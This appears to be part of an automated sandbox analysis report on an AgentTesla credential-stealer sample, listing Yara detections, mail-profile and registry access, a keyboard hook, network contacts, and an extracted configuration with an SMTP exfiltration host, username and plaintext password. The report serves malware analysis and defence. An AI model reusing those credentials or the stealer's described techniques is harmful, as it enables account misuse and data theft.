Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Yara detected Credential Stealer

Source: Yara match	File source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.InstallUtil.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2444515974.0000000006E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4700981421.0000000002741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2417476771.0000000002823000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5092, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.InstallUtil.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4700981421.000000000276E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2417476771.0000000002872000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2444515974.0000000006E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4700981421.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2417476771.000000000284F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4700981421.0000000002741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2417476771.0000000002823000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5092, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	true
163.44.198.71	nffplp.com	Singapore		135161	GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG	true

Contacted Domains

Name	IP	Active
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true
ip-api.com	208.95.112.1	true
nffplp.com	163.44.198.71	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ip-api.com/line/?fields=hosting	false	URL Reputation: safe	unknown

AV Detection

Found malware configuration

Source: 8.2.InstallUtil.exe.380000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "nffplp.com", "Username": "airlet@nffplp.com", "Password": "$Nke%8XIIDtm"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006797000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.00000000066F5000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004FC9000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289959595.0000000008940000.00000004.08000000.00040000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D7A000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000056C4000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E1D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006797000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.00000000066F5000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004FC9000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289959595.0000000008940000.00000004.08000000.00040000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D7A000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000056C4000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E1D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: powershell.pdbUGP source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000000.2230623116.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, ChannelUris.bat.Zhe, 00000013.00000000.2381194622.0000000000248000.00000020.00000001.01000000.00000009.sdmp, ChannelUris.bat.Zhe.17.dr, 87M9Y3P4Z7.bat.Zhe.5.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: powershell.pdb source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000000.2230623116.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, ChannelUris.bat.Zhe, 00000013.00000000.2381194622.0000000000248000.00000020.00000001.01000000.00000009.sdmp, ChannelUris.bat.Zhe.17.dr, 87M9Y3P4Z7.bat.Zhe.5.dr

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h		7_2_089BD340
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h		19_2_093AD340

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.InstallUtil.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.raw.unpack, type: UNPACKEDPE

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49757 -> 163.44.198.71:587

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 163.44.198.71 163.44.198.71

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View	ASN Name: GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG

May check the online IP address of the machine

Source: unknown

DNS query: name: ip-api.com

Uses SMTP (mail sending)

Source: global traffic

TCP traffic: 192.168.2.6:49757 -> 163.44.198.71:587

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: nffplp.com

Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059BF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4696584069.00000000008CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2411444957.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2281586637.0000000006DD4000.00000004.00000020.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2281586637.0000000006D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4696584069.00000000008CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicServerAuthenticationRootE46.crl0
Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4696584069.00000000008CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicServerAuthenticationRootE46.p7c0#
Source: InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/cPan/
Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/cPanelECCDomainValidationSecureServerCA3.crt0#
Source: InstallUtil.exe, 00000008.00000002.2417476771.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2413879182.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E93000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4698691808.000000000096E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.000000000276E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nffplp.com
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000005908000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006039000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059BF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4696584069.00000000008CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: InstallUtil.exe, 00000008.00000002.2413879182.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2430917504.0000000004E08000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.0000000002855000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4714376240.0000000005940000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4696584069.00000000008CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005122000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2472138860.00000000077E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2417476771.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.4700981421.0000000002711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005122000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2472138860.00000000077E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E93000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006039000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006039000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006039000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005122000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2472138860.00000000077E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000005908000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006039000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000052F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
